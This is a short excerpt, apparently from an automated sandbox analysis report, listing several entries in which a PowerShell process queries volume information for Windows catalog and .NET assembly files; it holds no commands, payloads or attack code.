Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation | Jump to behavior |